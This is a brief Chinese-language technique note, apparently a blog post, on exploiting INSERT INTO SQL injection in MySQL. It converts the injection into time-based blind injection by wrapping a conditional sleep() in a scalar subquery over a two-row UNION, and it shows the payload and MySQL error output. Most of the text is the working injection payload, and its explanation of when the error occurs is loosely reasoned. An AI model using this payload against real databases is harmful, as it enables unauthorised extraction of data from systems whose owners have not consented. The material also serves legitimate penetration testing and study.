SQL Insert into 注入

使用sqlmap会使测试数据库中插入大量测试语句,而且产生大量日志,下面的方法利用mysql在scalar subquiryinsert into类型的注入转换为Time-based blind注入。

先看执行效果:

1
2
3
4
mysql> select (select case when 1=1 then sleep(1) else 'hello' end from ((select 1 as a) union (select 2 as a)) test);
ERROR 1242 (21000): Subquery returns more than 1 row
mysql> select (select case when 1=2 then sleep(1) else 'hello' end from ((select 1 as a) union (select 2 as a)) test);
ERROR 1242 (21000): Subquery returns more than 1 row

先看语句:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
select (
select case
when 1=1
then sleep(3)
else
'hello'
end
from
(
(select 1 as a)
union
(select 2 as a)
)
test);

经过实验可得,如果from后面,union前后的两个select子查询使用相同的值,则会返回一列,故不会出错,从而导致insert into语句成功执行;当两个值不相同时,无论判断成功与否,都会导致insert into语句执行失败,从而转化为时间盲注。

参考:
http://www.mathyvanhoef.com/2011/10/exploiting-insert-into-sql-injections.html
https://dev.mysql.com/doc/refman/5.6/en/scalar-subqueries.html